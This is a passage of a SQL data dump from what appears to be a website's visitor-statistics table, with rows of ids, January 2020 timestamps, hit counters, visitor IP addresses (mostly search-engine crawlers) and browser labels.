1579788954,1,1,0,0,'31.13.127.21','other'),(476787,1579788955,1,1,0,0,'31.13.127.5','other'),(476788,1579788956,1,1,0,0,'31.13.127.4','other'),(476790,1579789295,1,1,0,0,'37.9.113.97','other'),(476791,1579789371,2,2,0,0,'207.46.13.160','other'),(476792,1579789491,1,0,1,0,'207.46.13.165',''),(476793,1579790831,1,1,0,0,'91.196.178.93','chrome'),(476794,1579791809,1,0,1,0,'157.55.39.77',''),(476795,1579792198,1,1,0,0,'91.231.40.41','chrome'),(476796,1579793101,1,1,0,0,'194.247.173.1','chrome'),(476797,1579793379,1,1,0,0,'88.154.167.148','chrome'),(476798,1579794068,1,1,0,0,'91.196.178.175','chrome'),(476799,1579794201,1,1,0,0,'157.55.39.77','other'),(476800,1579797337,1,1,0,0,'141.8.188.39','other'),(476801,1579799321,1,1,0,0,'8.29.198.25','other'),(476802,1579799492,1,1,0,0,'8.29.198.27','other'),(476803,1579799855,1,1,0,0,'46.22.211.9','firefox'),(476804,1579800162,1,1,0,0,'173.252.87.6','other'),(476805,1579800164,1,1,0,0,'173.252.87.42','other'),(476808,1579800165,1,1,0,0,'91.219.222.12','chrome'),(476809,1579800355,1,1,0,0,'91.196.178.15','chrome'),(476810,1579800511,1,1,0,0,'185.15.56.22','other'),(476811,1579800987,1,1,0,0,'141.8.142.119','other'),(476812,1579801379,1,1,0,0,'91.196.178.93','chrome'),(476813,1579801479,1,0,1,0,'157.55.39.229',''),(476814,1579803489,1,1,0,0,'5.255.253.8','other'),(476815,1579804502,1,1,0,0,'157.55.39.229','other'),(476816,1579804574,1,1,0,0,'207.46.13.124','other'),(476817,1579804711,1,1,0,0,'95.108.213.55','other'),(476818,1579807153,1,1,0,0,'91.196.178.61','chrome'),(476819,1579807195,1,1,0,0,'92.112.124.132','chrome'),(476820,1579807644,1,1,0,0,'95.108.181.103','other'),(476821,1579807645,1,0,1,0,'207.46.13.126',''),(476822,1579807773,1,1,0,0,'141.8.183.53','other'),(476823,1579809086,1,1,0,0,'107.21.1.8','other'),(476824,1579809088,1,1,0,0,'54.208.102.37','other'),(476825,1579809856,1,1,0,0,'91.196.178.2','chrome'),(476826,1579810296,2,2,0,0,'8.29.198.26','other'),(476827,1579810803,1,1,0,0,'87.250.224.104','other'),(476828,1579810816,1,1,0,0,'178.154.171.134','other'),(476829,1579810973,1,0,1,0,'66.249.70.36',''),(476830,1579812125,1,1,0,0,'31.13.127.19','other'),(476831,1579812376,1,1,0,0,'207.46.13.9','other'),(476832,1579813907,1,1,0,0,'207.46.13.9','other'),(476833,1579815169,1,1,0,0,'157.55.39.178','other'),(476834,1579815464,1,1,0,0,'5.53.124.40','other'),(476835,1579816389,1,1,0,0,'141.8.188.20','other'),(476836,1579816990,1,1,0,0,'207.46.13.163','other'),(476837,1579817555,1,1,0,0,'91.209.11.236','other'),(476838,1579817582,1,1,0,0,'5.255.253.8','other'),(476839,1579817602,1,1,0,0,'37.9.113.97','other'),(476840,1579818472,2,0,2,0,'157.55.39.140',''),(476841,1579818551,1,1,0,0,'91.209.11.236','other'),(476842,1579820110,1,1,0,0,'66.249.64.27','chrome'),(476843,1579820387,1,1,0,0,'141.8.142.164','other'),(476844,1579821262,2,2,0,0,'8.29.198.27','other'),(476845,1579821460,1,0,1,0,'207.46.13.9',''),(476846,1579822229,1,1,0,0,'141.8.183.53','other'),(476847,1579823264,1,1,0,0,'207.46.13.9','other'),(476848,1579824013,1,1,0,0,'207.46.13.193','other'),(476849,1579824104,1,1,0,0,'209.208.79.19','chrome'),(476850,1579825694,1,1,0,0,'141.8.183.18','other'),(476851,1579826489,1,1,0,0,'207.46.13.50','other'),(476852,1579827314,1,1,0,0,'62.205.134.182','other'),(476853,1579827511,1,1,0,0,'141.8.142.128','other'),(476854,1579828381,2,2,0,0,'157.55.39.71','other'),(476855,1579829244,1,1,0,0,'35.172.195.82','other'),(476856,1579829503,1,1,0,0,'95.108.213.61','other'),(476857,1579830220,4,4,0,0,'35.172.195.82','other'),(476858,1579830744,1,1,0,0,'34.217.86.26','chrome'),(476859,1579830747,1,1,0,0,'52.41.211.72','other'),(476860,1579830904,1,1,0,0,'141.8.188.12','other'),(476861,1579832214,1,1,0,0,'8.29.198.26','other'),(476862,1579832355,1,1,0,0,'8.29.198.27','other'),(476863,1579832449,3,3,0,0,'35.172.195.82','other'),(476864,1579833054,2,2,0,0,'176.36.20.3','other'),(476865,1579833483,1,0,1,0,'66.249.64.26',''),(476866,1579833485,1,1,0,0,'66.249.64.26','chrome'),(476867,1579833811,1,1,0,0,'37.9.113.33','other'),(476868,1579833827,7,7,0,0,'35.172.195.82','other'),(476869,1579833834,1,1,0,0,'178.154.171.7','other'),(476870,1579834214,1,1,0,0,'157.55.39.236','other'),(476871,1579834839,3,3,0,0,'35.172.195.82','other'),(476872,1579835572,2,2,0,0,'157.55.39.236','other'),(476873,1579835891,1,1,0,0,'35.172.195.82','other'),(476874,1579836238,1,1,0,0,'178.154.171.134','other'),(476875,1579836263,2,2,0,0,'207.46.13.176','other'),(476876,1579836301,2,2,0,0,'66.249.64.26','chrome'),(476877,1579836309,1,1,0,0,'66.249.64.27','chrome'),(476878,1579837280,3,3,0,0,'66.249.64.28','chrome'),(476879,1579837635,1,1,0,0,'157.55.39.71','other'),(476880,1579837905,1,1,0,0,'66.249.64.26','chrome'),(476881,1579838040,1,1,0,0,'66.249.70.33','chrome'),(476882,1579838655,1,1,0,0,'157.55.39.71','other'),(476883,1579838887,1,1,0,0,'37.9.113.97','other'),(476884,1579839800,2,2,0,0,'66.249.64.26','chrome'),(476885,1579839929,1,1,0,0,'66.249.64.27','chrome'),(476886,1579840125,1,1,0,0,'37.9.113.202','other'),(476887,1579840322,1,1,0,0,'178.154.171.7','other'),(476888,1579841105,3,3,0,0,'157.55.39.71','other'),(476889,1579841579,1,1,0,0,'95.108.213.55','other'),(476890,1579841612,1,1,0,0,'141.8.142.115','other'),(476891,1579841717,1,1,0,0,'66.249.64.28','chrome'),(476892,1579841858,1,1,0,0,'66.249.64.26','chrome'),(476893,1579842012,1,1,0,0,'157.55.39.71','other'),(476894,1579842507,1,1,0,0,'157.55.39.236','other'),(476895,1579842987,1,1,0,0,'66.249.89.28','other'),(476896,1579843012,3,3,0,0,'207.46.13.247','other'),(476897,1579843177,1,1,0,0,'8.29.198.25','other'),(476898,1579843263,1,1,0,0,'8.29.198.27','other'),(476899,1579843403,1,1,0,0,'66.249.64.27','chrome'),(476900,1579843559,1,1,0,0,'66.249.70.36','chrome'),(476901,1579844601,1,1,0,0,'141.8.132.2','other'),(476902,1579844767,1,1,0,0,'62.205.134.182','other'),(476903,1579844924,1,1,0,0,'207.46.13.247','other'),(476904,1579845040,1,1,0,0,'66.249.64.28','chrome'),(476905,1579846675,1,1,0,0,'5.45.207.43','other'),(476906,1579846696,1,1,0,0,'141.8.142.164','other'),(476907,1579848260,1,1,0,0,'207.46.13.247','other'),(476908,1579848652,1,1,0,0,'66.249.64.27','chrome'),(476909,1579850365,1,1,0,0,'141.8.183.67','other'),(476910,1579850435,1,1,0,0,'217.117.75.168','firefox'),(476911,1579850478,1,1,0,0,'52.114.75.71','other'),(476912,1579850928,1,1,0,0,'37.9.113.6','other'),(476913,1579851117,1,1,0,0,'141.8.142.115','other'),(476914,1579851453,1,1,0,0,'91.196.178.165','chrome'),(476915,1579851804,1,1,0,0,'178.154.171.127','other'),(476916,1579852262,1,1,0,0,'66.249.64.26','chrome'),(476917,1579852267,1,1,0,0,'66.249.64.27','chrome'),(476918,1579853653,1,1,0,0,'91.196.178.93','chrome'),(476919,1579853860,1,1,0,0,'157.55.39.71','other'),(476920,1579853998,1,1,0,0,'173.252.87.20','other'),(476921,1579853999,1,1,0,0,'173.252.87.26','other'),(476922,1579854121,2,2,0,0,'8.29.198.26','other'),(476923,1579855341,1,1,0,0,'157.55.39.71','other'),(476924,1579855487,1,1,0,0,'66.249.64.26','chrome'),(476925,1579856625,2,2,0,0,'157.55.39.236','other'),(476926,1579857927,1,1,0,0,'178.154.171.134','other'),(476927,1579858121,2,2,0,0,'91.196.177.15','chrome'),(476928,1579858153,1,1,0,0,'212.1.124.210','chrome'),(476929,1579858224,1,1,0,0,'217.117.64.133','firefox'),(476930,1579858230,1,1,0,0,'217.117.64.132','firefox'),(476931,1579858826,1,1,0,0,'141.8.132.2','other'),(476932,1579859327,1,1,0,0,'212.113.43.134','chrome'),(476933,1579860508,1,1,0,0,'91.196.178.169','chrome'),(476934,1579860759,1,1,0,0,'3.215.117.180','chrome'),(476935,1579861642,1,1,0,0,'37.9.113.200','other'),(476936,1579861717,1,1,0,0,'91.196.178.175','chrome'),(476937,1579862193,1,1,0,0,'207.46.13.36','other'),(476938,1579862493,1,1,0,0,'207.46.13.247','other'),(476939,1579862639,1,1,0,0,'54.208.102.37','other'),(476940,1579862641,1,1,0,0,'107.21.1.8','other'),(476941,1579862857,1,1,0,0,'91.196.178.18','chrome'),(476942,1579863098,1,1,0,0,'157.55.39.71','other'),(476943,1579863140,1,1,0,0,'91.196.178.169','chrome'),(476944,1579863523,1,1,0,0,'212.113.43.134','chrome'),(476945,1579864837,1,1,0,0,'66.249.64.26','chrome'),(476946,1579864869,1,1,0,0,'66.249.64.27','chrome'),(476947,1579865068,1,1,0,0,'8.29.198.26','other'),(476948,1579865125,1,1,0,0,'8.29.198.25','other'),(476949,1579865507,1,1,0,0,'37.9.113.33','other'),(476950,1579866059,1,1,0,0,'207.46.13.247','other'),(476951,1579866348,1,1,0,0,'109.74.154.72','chrome'),(476952,1579866364,1,1,0,0,'157.55.39.71','other'),(476953,1579868385,1,1,0,0,'66.249.64.27','chrome'),(476954,1579869029,1,1,0,0,'207.46.13.36','other'),(476955,1579869209,1,1,0,0,'207.46.13.247','other'),(476956,1579871202,1,1,0,0,'91.124.181.171','firefox'),(476957,1579871763,1,1,0,0,'91.196.178.82','chrome'),(476958,1579871857,1,1,0,0,'207.46.13.247','other'),(476959,1579871932,1,1,0,0,'157.55.39.71','other'),(476960,1579872070,1,1,0,0,'213.180.203.75','other'),(476961,1579873112,1,1,0,0,'207.46.13.247','other'),(476962,1579873420,2,2,0,0,'207.46.13.36','other'),(476963,1579874675,1,1,0,0,'91.196.178.91','firefox'),(476964,1579875100,1,1,0,0,'91.196.177.228','chrome'),(476965,1579875710,1,1,0,0,'207.46.13.247','other'),(476966,1579875838,1,1,0,0,'66.249.64.26','chrome'),(476967,1579876002,2,2,0,0,'8.29.198.26','other'),(476968,1579877415,1,1,0,0,'213.180.203.75','other'),(476969,1579877451,1,1,0,0,'91.196.178.183','chrome'),(476970,1579877552,1,1,0,0,'91.209.11.236','other'),(476971,1579878545,1,1,0,0,'207.46.13.247','other'),(476972,1579878937,1,1,0,0,'157.55.39.71','other'),(476973,1579879490,1,1,0,0,'66.249.64.28','chrome'),(476974,1579879887,1,1,0,0,'91.209.11.236','other'),(476975,1579880234,1,1,0,0,'213.180.203.75','other'),(476976,1579880361,1,1,0,0,'206.189.92.18','other'),(476977,1579880427,1,1,0,0,'207.46.13.247','other'),(476978,1579880471,1,1,0,0,'207.46.13.168','other'),(476979,1579880539,1,1,0,0,'207.46.13.36','other'),(476980,1579881067,1,1,0,0,'66.249.64.28','chrome'),(476981,1579881507,1,1,0,0,'207.46.13.247','other'),(476982,1579881511,1,1,0,0,'13.66.139.0','other'),(476983,1579882698,1,1,0,0,'157.55.39.71','other'),(476984,1579883008,1,1,0,0,'207.46.13.168','other'),(476985,1579883319,1,1,0,0,'207.46.13.36','other'),(476986,1579883550,1,1,0,0,'213.180.203.75','other'),(476987,1579884218,2,2,0,0,'157.55.39.71','other'),(476988,1579885507,1,1,0,0,'207.46.13.36','other'),(476989,1579885788,1,1,0,0,'94.29.72.33','chrome'),(476990,1579886014,1,1,0,0,'207.46.13.247','other'),(476991,1579886279,1,1,0,0,'66.249.64.28','chrome'),(476992,1579886677,1,1,0,0,'66.249.64.27','chrome'),(476993,1579886963,2,2,0,0,'8.29.198.27','other'),(476994,1579887488,1,0,1,0,'66.249.64.28',''),(476995,1579888128,1,1,0,0,'207.46.13.168','other'),(476996,1579889682,2,2,0,0,'207.46.13.247','other'),(476997,1579889942,1,1,0,0,'66.249.64.28','chrome'),(476998,1579890619,1,1,0,0,'157.55.39.71','other'),(476999,1579890727,1,1,0,0,'91.196.178.15','chrome'),(477000,1579891585,1,1,0,0,'207.46.13.178','other'),(477001,1579892179,1,1,0,0,'157.55.39.71','other'),(477002,1579892922,1,1,0,0,'213.180.203.75','other'),(477003,1579893003,1,1,0,0,'207.46.13.247','other'),(477004,1579894313,1,1,0,0,'207.46.13.36','other'),(477005,1579895047,2,2,0,0,'207.46.13.247','other'),(477006,1579896687,1,1,0,0,'207.46.13.247','other'),(477007,1579896777,2,2,0,0,'207.46.13.168','other'),(477008,1579897191,1,1,0,0,'13.66.139.0','other'),(477009,1579897906,2,2,0,0,'8.29.198.25','other'),(477010,1579899017,1,1,0,0,'157.55.39.71','other'),(477011,1579899875,1,1,0,0,'207.46.13.168','other'),(477012,1579900562,1,1,0,0,'66.249.64.28','chrome'),(477013,1579900692,1,1,0,0,'207.46.13.36','other'),(477014,1579901144,1,1,0,0,'69.171.251.18','other'),(477015,1579901145,1,1,0,0,'69.171.251.13','other'),(477016,1579901170,1,1,0,0,'207.46.13.178','other'),(477017,1579901268,1,1,0,0,'157.55.39.71','other'),(477018,1579902184,1,1,0,0,'207.46.13.247','other'),(477019,1579903306,1,1,0,0,'157.55.39.71','other'),(477020,1579904118,1,1,0,0,'66.249.64.27','chrome'),(477021,1579905610,1,1,0,0,'207.46.13.247','other'),(477022,1579906248,1,1,0,0,'157.55.39.71','other'),(477023,1579907018,2,2,0,0,'207.46.13.168','other'),(477024,1579907767,1,1,0,0,'178.154.171.134','other'),(477025,1579908861,2,2,0,0,'8.29.198.25','other'),(477026,1579909141,1,1,0,0,'165.22.24.71','other'),(477027,1579909796,1,1,0,0,'178.154.171.127','other'),(477028,1579909866,1,1,0,0,'207.46.13.247','other'),(477029,1579909946,1,1,0,0,'157.55.39.10','other'),(477030,1579910189,2,2,0,0,'148.251.138.219','chrome'),(477031,1579910193,2,2,0,0,'148.251.138.219','firefox'),(477032,1579911120,1,1,0,0,'207.46.13.247','other'),(477033,1579911515,1,1,0,0,'157.55.39.71','other'),(477034,1579913043,2,2,0,0,'207.46.13.247','other'),(477035,1579913127,1,1,0,0,'5.165.255.98','chrome'),(477036,1579913134,1,1,0,0,'128.72.6.226','chrome'),(477037,1579913508,1,1,0,0,'157.55.39.71','other'),(477038,1579913713,1,1,0,0,'62.205.134.182','other'),(477039,1579913741,1,1,0,0,'207.46.13.73','other'),(477040,1579914171,1,1,0,0,'157.55.39.225','other'),(477041,1579914753,1,1,0,0,'178.154.171.134','other'),(477042,1579915202,1,1,0,0,'157.55.39.225','other'),(477043,1579916241,1,1,0,0,'157.55.39.71','other'),(477044,1579916354,1,1,0,0,'178.154.171.134','other'),(477045,1579917599,1,1,0,0,'66.249.70.62','chrome'),(477046,1579918149,1,1,0,0,'178.154.171.134','other'),(477047,1579918588,1,1,0,0,'157.55.39.225','other'),(477048,1579919773,1,1,0,0,'8.29.198.25','other'),(477049,1579919780,1,1,0,0,'8.29.198.27','other'),(477050,1579921618,1,1,0,0,'178.154.171.134','other'),(477051,1579921788,1,1,0,0,'157.55.39.225','other'),(477052,1579922557,1,1,0,0,'178.154.171.127','other'),(477053,1579923831,1,1,0,0,'157.55.39.71','other'),(477054,1579924178,1,1,0,0,'66.249.64.26','chrome'),(477055,1579924807,1,1,0,0,'157.55.39.71','other'),(477056,1579924894,120,120,0,0,'148.251.138.219','other'),(477057,1579925004,1,1,0,0,'157.55.39.246','other'),(477058,1579925785,1,1,0,0,'66.249.64.28','chrome'),(477059,1579925957,1,1,0,0,'52.33.67.216','chrome'),(477060,1579925960,1,1,0,0,'52.34.24.33','other'),(477061,1579928044,1,1,0,0,'207.46.13.23','other'),(477062,1579928328,1,1,0,0,'157.55.39.71','other'),(477063,1579929344,2,2,0,0,'66.249.64.28','chrome'),(477064,1579929399,1,1,0,0,'66.249.70.33','chrome'),(477065,1579929512,2,2,0,0,'157.55.39.225','other'),(477066,1579930244,1,1,0,0,'157.55.39.252','other'),(477067,1579930683,1,1,0,0,'8.29.198.26','other'),(477069,1579930686,1,1,0,0,'8.29.198.27','other'),(477070,1579931049,1,1,0,0,'157.55.39.71','other'),(477071,1579931106,1,1,0,0,'62.205.134.182','other'),(477072,1579931237,1,1,0,0,'66.249.64.27','chrome'),(477073,1579931299,1,1,0,0,'66.249.64.26','chrome'),(477074,1579932980,2,2,0,0,'66.249.64.26','chrome'),(477075,1579933504,1,1,0,0,'157.55.39.246','other'),(477076,1579935888,1,1,0,0,'157.55.39.252','other'),(477077,1579936187,1,1,0,0,'157.55.39.71','other'),(477078,1579936353,2,2,0,0,'157.55.39.246','other'),(477079,1579937304,1,1,0,0,'157.55.39.246','other'),(477080,1579937841,1,1,0,0,'66.249.64.26','chrome'),(477081,1579939549,1,1,0,0,'157.55.39.71','other'),(477082,1579941598,2,2,0,0,'8.29.198.25','other'),(477083,1579943055,1,1,0,0,'66.249.64.28','chrome'),(477084,1579943625,3,3,0,0,'157.55.39.246','other'),(477085,1579943897,1,1,0,0,'66.102.9.164','chrome'),(477086,1579945022,1,1,0,0,'107.178.194.172','chrome'),(477087,1579945173,1,1,0,0,'157.55.39.246','other'),(477088,1579945898,1,1,0,0,'37.145.197.217','other'),(477089,1579945994,1,1,0,0,'178.154.171.134','other'),(477090,1579946181,18,18,0,0,'95.216.19.59','other'),(477091,1579946666,1,1,0,0,'31.13.127.23','other'),(477092,1579946668,1,1,0,0,'31.13.127.18','other'),(477093,1579947412,1,1,0,0,'157.55.39.246','other'),(477094,1579948139,1,1,0,0,'157.55.39.71','other'),(477095,1579948217,18,18,0,0,'207.244.157.10','other'),(477096,1579948743,1,1,0,0,'178.154.171.134','other'),(477097,1579949279,1,1,0,0,'66.249.64.28','chrome'),(477098,1579950144,1,1,0,0,'178.154.171.134','other'),(477099,1579951516,1,1,0,0,'109.74.154.72','chrome'),(477100,1579952352,2,2,0,0,'157.55.39.71','other'),(477101,1579952474,1,1,0,0,'157.55.39.246','other'),(477102,1579952480,1,1,0,0,'8.29.198.25','other'),(477103,1579952497,1,1,0,0,'8.29.198.27','other'),(477104,1579954705,1,1,0,0,'95.132.14.44','other'),(477105,1579955055,1,1,0,0,'157.55.39.71','other'),(477106,1579955429,1,1,0,0,'165.22.24.71','other'),(477107,1579956621,2,2,0,0,'157.55.39.246','other'),(477108,1579956811,1,1,0,0,'185.244.219.121','chrome'),(477109,1579957501,1,1,0,0,'157.55.39.71','other'),(477110,1579957815,1,1,0,0,'157.55.39.246','other'),(477111,1579958231,1,1,0,0,'157.55.39.237','other'),(477112,1579959301,1,1,0,0,'141.8.183.53','other'),(477113,1579960579,1,1,0,0,'157.55.39.246','other'),(477114,1579961905,1,1,0,0,'157.55.39.71','other'),(477115,1579962926,1,1,0,0,'157.55.39.237','other'),(477116,1579963374,1,1,0,0,'8.29.198.27','other'),(477117,1579963405,1,1,0,0,'8.29.198.26','other'),(477118,1579964959,4,4,0,0,'157.55.39.237','other'),(477119,1579965229,1,1,0,0,'157.55.39.246','other'),(477120,1579965380,1,1,0,0,'66.249.64.26','chrome'),(477121,1579965585,2,2,0,0,'31.13.127.1','other'),(477122,1579966225,1,1,0,0,'157.55.39.71','other'),(477123,1579966495,3,3,0,0,'35.225.48.89','chrome'),(477124,1579966512,3,3,0,0,'35.226.211.78','chrome'),(477125,1579966521,4,4,0,0,'104.198.225.195','chrome'),(477127,1579966539,2,2,0,0,'35.222.69.92','chrome'),(477129,1579966548,1,1,0,0,'35.225.207.176','chrome'),(477130,1579966549,2,2,0,0,'35.225.207.176','chrome'),(477131,1579967698,1,1,0,0,'157.55.39.71','other'),(477132,1579968652,1,1,0,0,'159.69.177.200','other'),(477133,1579969029,1,1,0,0,'157.55.39.246','other'),(477134,1579969226,2,2,0,0,'66.249.64.26','chrome'),(477135,1579969229,1,1,0,0,'66.249.64.27','chrome'),(477136,1579969617,1,1,0,0,'178.154.171.134','other'),(477137,1579971943,1,1,0,0,'157.55.39.246','other'),(477138,1579974270,2,2,0,0,'8.29.198.27','other'),(477139,1579974549,2,2,0,0,'66.249.64.26','chrome'),(477140,1579974599,1,1,0,0,'178.154.171.134','other'),(477141,1579974607,2,2,0,0,'157.55.39.71','other'),(477142,1579975184,1,1,0,0,'178.154.171.127','other'),(477143,1579975646,1,1,0,0,'94.230.208.147','chrome'),(477144,1579978100,1,1,0,0,'66.249.64.26','chrome'),(477145,1579978224,57,57,0,0,'207.180.218.247','other'),(477146,1579978480,2,2,0,0,'178.154.171.134','other'),(477147,1579979126,86,86,0,0,'207.180.218.247','other'),(477148,1579979424,2,2,0,0,'92.38.148.53','chrome'),(477149,1579979551,2,2,0,0,'157.55.39.246','other'),(477150,1579979592,1,1,0,0,'178.154.171.134','other'),(477151,1579979920,1,1,0,0,'66.249.64.26','chrome'),(477152,1579979935,2,2,0,0,'157.55.39.71','other'),(477153,1579980138,1,1,0,0,'109.86.1.228','other'),(477154,1579980140,1,1,0,0,'109.86.1.228','msie'),(477155,1579980933,7,7,0,0,'34.229.131.116','other'),(477156,1579981929,1,1,0,0,'91.196.178.151','firefox'),(477157,1579982255,5,5,0,0,'34.229.131.116','other'),(477158,1579982428,1,1,0,0,'157.55.39.162','other'),(477159,1579982680,1,1,0,0,'157.55.39.71','other'),(477160,1579982896,1,1,0,0,'193.106.30.99','firefox'),(477161,1579983010,2,2,0,0,'157.55.39.246','other'),(477162,1579983198,10,10,0,0,'34.229.131.116','other'),(477163,1579983649,1,1,0,0,'66.249.70.33','chrome'),(477164,1579983716,1,1,0,0,'141.8.142.164','other'),(477165,1579984457,4,4,0,0,'34.229.131.116','other'),(477166,1579985176,2,2,0,0,'8.29.198.27','other'),(477167,1579985649,8,8,0,0,'34.229.131.116','other'),(477168,1579986159,1,1,0,0,'157.55.39.71','other'),(477169,1579986239,1,1,0,0,'157.55.39.246','other'),(477170,1579986373,1,1,0,0,'141.8.188.25','other'),(477171,1579986615,1,1,0,0,'178.154.171.127','other'),(477172,1579986642,6,6,0,0,'34.229.131.116','other'),(477173,1579987051,1,1,0,0,'13.66.139.0','other'),(477174,1579987577,6,6,0,0,'34.229.131.116','other'),(477175,1579987681,1,1,0,0,'157.55.39.71','other'),(477176,1579987724,1,1,0,0,'178.154.171.134','other'),(477177,1579988224,1,1,0,0,'178.154.171.127','other'),(477178,1579988312,1,1,0,0,'157.55.39.85','other'),(477179,1579988567,2,2,0,0,'34.229.131.116','other'),(477180,1579988792,1,1,0,0,'2.59.43.96','chrome'),(477181,1579988932,1,1,0,0,'66.249.64.27','chrome'),(477182,1579988942,2,2,0,0,'157.55.39.71','other'),(477183,1579989104,2,2,0,0,'178.154.171.134','other'),(477184,1579990230,1,1,0,0,'157.55.39.85','other'),(477185,1579990404,1,1,0,0,'93.73.82.160','chrome'),(477186,1579990416,2,2,0,0,'207.46.13.87','other'),(477187,1579991187,1,1,0,0,'157.55.39.71','other'),(477188,1579991546,1,1,0,0,'157.55.39.162','other'),(477189,1579992453,1,1,0,0,'207.46.13.87','other'),(477190,1579992509,1,1,0,0,'66.249.64.27','chrome'),(477191,1579992967,1,1,0,0,'66.249.64.26','chrome'),(477192,1579993354,2,2,0,0,'207.46.13.87','other'),(477193,1579993868,1,1,0,0,'178.154.171.134','other'),(477194,1579994655,1,1,0,0,'95.108.213.55','other'),(477195,1579994869,1,1,0,0,'3.136.156.148','chrome'),(477196,1579995975,1,1,0,0,'178.154.171.127','other'),(477197,1579996005,2,2,0,0,'178.154.171.134','other'),(477198,1579996067,1,1,0,0,'8.29.198.27','other'),(477199,1579996142,1,1,0,0,'8.29.198.25','other'),(477200,1579996919,1,1,0,0,'157.55.39.85','other'),(477201,1579997473,1,1,0,0,'178.154.171.134','other'),(477202,1579997873,1,1,0,0,'157.55.39.71','other'),(477203,1579998698,9,9,0,0,'78.85.4.61','firefox'),(477204,1579999339,1,1,0,0,'157.55.39.85','other'),(477205,1580000113,1,1,0,0,'62.205.134.182','other'),(477206,1580000434,2,2,0,0,'207.46.13.87','other'),(477207,1580000853,1,1,0,0,'157.55.39.71','other'),(477208,1580001526,1,1,0,0,'178.154.171.127','other'),(477209,1580001727,1,1,0,0,'66.249.64.26','chrome'),(477210,1580003154,1,1,0,0,'157.55.39.85','other'),(477211,1580003565,2,2,0,0,'157.55.39.71','other'),(477212,1580004170,1,1,0,0,'141.8.142.164','other'),(477213,1580005807,1,1,0,0,'141.8.142.115','other'),(477214,1580006944,1,1,0,0,'157.55.39.85','other'),(477215,1580006961,1,1,0,0,'8.29.198.27','other'),(477216,1580007036,1,1,0,0,'8.29.198.25','other'),(477217,1580007152,1,1,0,0,'178.154.171.127','other'),(477218,1580007200,2,2,0,0,'66.249.64.27','chrome'),(477219,1580008480,1,1,0,0,'157.55.39.85','other'),(477220,1580008764,1,1,0,0,'178.154.171.134','other'),(477221,1580009141,1,1,0,0,'66.249.64.27','chrome'),(477222,1580012323,1,1,0,0,'66.249.64.27','chrome'),(477223,1580012326,1,1,0,0,'66.249.64.28','chrome'),(477224,1580012511,2,2,0,0,'157.55.39.85','other'),(477225,1580012836,1,1,0,0,'157.55.39.71','other'),(477226,1580013037,1,1,0,0,'52.43.88.150','chrome'),(477227,1580013040,1,1,0,0,'52.34.24.33','other'),(477228,1580013830,2,2,0,0,'207.46.13.87','other'),(477229,1580014592,1,1,0,0,'66.249.64.27','chrome'),(477230,1580015210,1,1,0,0,'157.55.39.85','other'),(477231,1580015296,1,1,0,0,'207.46.13.51','other'),(477232,1580016185,1,1,0,0,'157.55.39.85','other'),(477233,1580017640,1,1,0,0,'157.55.39.85','other'),(477234,1580017834,2,2,0,0,'8.29.198.26','other'),(477235,1580017896,1,1,0,0,'62.205.134.182','other'),(477236,1580017983,1,1,0,0,'66.249.70.62','chrome'),(477237,1580019832,1,1,0,0,'66.249.64.26','chrome'),(477238,1580021655,1,1,0,0,'66.249.64.26','chrome'),(477239,1580022080,2,2,0,0,'157.55.39.71','other'),(477240,1580022256,1,1,0,0,'207.46.13.87','other'),(477241,1580023754,1,1,0,0,'188.163.76.78','chrome'),(477242,1580025441,1,0,1,0,'66.249.64.27',''),(477243,1580026057,1,1,0,0,'207.46.13.87','other'),(477244,1580028032,1,1,0,0,'31.13.127.18','other'),(477245,1580028033,1,1,0,0,'31.13.127.5','other'),(477246,1580028331,3,3,0,0,'157.55.39.157','other'),(477247,1580028550,1,1,0,0,'66.249.64.28','chrome'),(477248,1580028554,1,1,0,0,'66.249.64.26','chrome'),(477249,1580028563,1,1,0,0,'207.46.13.87','other'),(477250,1580028643,2,2,0,0,'64.225.113.129','firefox'),(477251,1580028726,2,2,0,0,'8.29.198.25','other'),(477252,1580031799,2,2,0,0,'31.13.103.19','other'),(477253,1580031800,1,1,0,0,'91.196.178.172','other'),(477254,1580031843,1,1,0,0,'31.13.103.3','other'),(477255,1580031844,3,3,0,0,'31.13.103.11','other'),(477265,1580031845,2,2,0,0,'31.13.103.21','other'),(477266,1580031872,2,2,0,0,'31.13.103.24','other'),(477267,1580031874,1,1,0,0,'31.13.103.10','other'),(477269,1580032151,1,1,0,0,'66.249.64.28','chrome'),(477270,1580037099,1,1,0,0,'157.55.39.157','other'),(477271,1580037731,1,1,0,0,'66.249.64.27','chrome'),(477272,1580037808,1,1,0,0,'66.249.64.26','chrome'),(477273,1580037885,1,1,0,0,'109.74.154.72','chrome'),(477274,1580037969,2,2,0,0,'207.46.13.87','other'),(477275,1580038811,1,1,0,0,'157.55.39.157','other'),(477276,1580039612,2,2,0,0,'8.29.198.25','other'),(477277,1580040218,1,1,0,0,'66.249.64.28','chrome'),(477278,1580040242,1,1,0,0,'66.249.64.27','chrome'),(477279,1580041012,1,1,0,0,'157.55.39.157','other'),(477280,1580042968,1,1,0,0,'66.249.70.62','chrome'),(477281,1580043574,1,1,0,0,'207.46.13.87','other'),(477282,1580045126,1,1,0,0,'157.55.39.157','other'),(477283,1580046197,3,3,0,0,'178.154.171.134','other'),(477284,1580046453,1,1,0,0,'178.154.171.127','other'),(477285,1580047876,2,2,0,0,'207.46.13.87','other'),(477286,1580047986,2,2,0,0,'66.249.64.26','chrome'),(477287,1580048357,1,1,0,0,'157.55.39.157','other'),(477288,1580049250,1,1,0,0,'178.154.171.134','other'),(477289,1580050305,1,1,0,0,'66.249.64.26','chrome'),(477290,1580050501,2,2,0,0,'8.29.198.25','other'),(477291,1580051859,1,1,0,0,'91.196.178.171','chrome'),(477292,1580052693,1,1,0,0,'207.46.13.211','other'),(477293,1580055162,1,1,0,0,'66.249.70.33','chrome'),(477294,1580057071,1,1,0,0,'66.249.64.27','chrome'),(477295,1580057096,1,1,0,0,'66.249.64.26','chrome'),(477296,1580057657,1,1,0,0,'207.46.13.87','other'),(477297,1580057927,1,1,0,0,'15.236.13.148','msie'),(477298,1580059384,1,1,0,0,'91.209.11.236','other'),(477299,1580059524,1,1,0,0,'178.154.171.134','other'),(477300,1580059607,1,1,0,0,'178.154.171.127','other'),(477301,1580060505,1,1,0,0,'51.68.152.26','chrome'),(477302,1580061118,1,1,0,0,'207.46.13.87','other'),(477303,1580061383,2,2,0,0,'8.29.198.25','other'),(477304,1580062810,1,1,0,0,'178.154.171.127','other'),(477305,1580062916,1,1,0,0,'66.249.64.26','chrome'),(477306,1580064704,1,1,0,0,'207.46.13.87','other'),(477307,1580066281,2,2,0,0,'66.249.64.28','chrome'),(477308,1580067155,2,2,0,0,'157.55.39.157','other'),(477309,1580067294,1,1,0,0,'178.154.171.127','other'),(47